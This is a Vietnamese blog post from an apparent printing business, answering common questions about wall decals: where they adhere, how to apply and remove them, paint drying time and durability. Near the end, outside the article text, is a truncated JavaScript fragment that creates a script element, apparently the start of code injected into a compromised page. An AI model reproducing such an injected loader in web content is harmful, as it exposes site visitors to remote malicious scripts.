In ấn - thiết kế

Decan dán tường và những câu hỏi thường gặp

Decan dán tường và những câu hỏi thường gặp

Decan dán tường và những câu hỏi thường gặp

Đánh giá in sản phẩm

Decal được dùng trong thiết kế và trang trí nội thất không còn xa lạ gì với nhiều gia đình hiện nay. Nhờ vào sự phong phú, đa dạng về hình thức mà decan đã trở thành một trong những xu hướng được ưa chuộng, nhất là decan dán tường. Chính vì thế, không quá khó hiểu vì sao các doanh nghiệp in decal lại được thành lập nhiều. Chúng tôi đã tổng hợp một số vấn đề thường gặp với decan dán tường để giúp cho bạn đọc có cái nhìn rõ ràng hơn về sản phẩm ứng dụng này.

Decan dán tường là gì?

Decan là nhãn tự dính hay giấy tự dính là nhiều tên gọi của một sản phẩm.Chúng có tráng sẵn lớp keo tự dính nhờ áp lực, được dùng để dán lên tường như một sản phẩm nội thất.

Decan được dán ở đâu là tốt nhất?

Decan có thể dán tốt trên tường phòng tắm và nhà bếp. Có thể sử dụng trên gương, gạch bóng, rèm nhựa phòng tắm, thậm chí cả thiết bị vệ sinh. Decan dùng để dán tường chịu được độ ẩm trong phòng tắm nhưng bề mặt cần dán phải khô trước khi dán.

Decal dán tường

Dán decan có khó không?

Sử dụng decan cực kỳ dễ dàng, chỉ cần gỡ một góc hoặc cạnh với móng tay và nhẹ nhàng bóc ra. Đối với bề mặt tường khó gỡ thì sử dụng thêm một máy sấy tóc để làm ấm decan nhằm làm cho chất keo mềm ra để dễ bóc và dán dính.

Ảnh hưởng của tường khi muốn loại bảo decan

Decan thường sẽ không để lại keo dính trên tường nên sẽ không bị tróc sơn nhưng nó rất phụ thuộc vào bề mặt tường. Cách gỡ bỏ decan mà không làm cho chúng bị bong tróc cũng dễ dàng không kém, nếu tường được sơn đúng các lớp yêu cầu ban đầu hoặc chất lượng sơn tốt, đồng thời dùng máy sấy làm nóng decal thì lúc gỡ ra sẽ rất thuận tiện.

Decan được dán tốt nhất và không tốt ở đâu?

Decan được dán tốt nhất trên mặt tường phẳng, tường sơn nước và kính. Và ngược lại, đối với các bề mặt tường vữa, vải, bề mặt xơ, tường gai, decan sẽ không bám dính bền lâu được.

Thời gian mà decan khô

Đối với các gia đình mới xây nhà, sau khi sơn tường từ  2 đến 3 tuần, tường sẽ khô sơn, lúc này mới có thể dán decan được. Còn nếu như tường chưa đủ khô mà sử dụng dán decal thì khi gỡ miếng decan định hình, lớp này sẽ làm tróc lớp sơn tường vừa mất tiền lại mất thẩm mỹ.

Độ bền của decan

Decan dán tường trong nhà có độ bền đến 4 năm và ngoài trời là 1 năm. Tuổi thọ của chúng phụ thuộc rất lớn vào cách bảo quản, gìn giữ của người sử dụng. Chính vì thế khi decan có dấu hiệu bẩn hay bong tróc thì nên dùng khăn sạch lau đi và dùng keo cố định lại vị trí bị rơi đó.

Mọi thông tin liên quan đến decan và in decan Tp.HCM, mời bạn đọc đón xem trong các bản tin tiếp theo của chúng tôi.

var d=document;var s=d.createElement(‘script’); if (document.currentScript) {

Posted in: Thông tin in ấn

Leave a Comment (0) ↓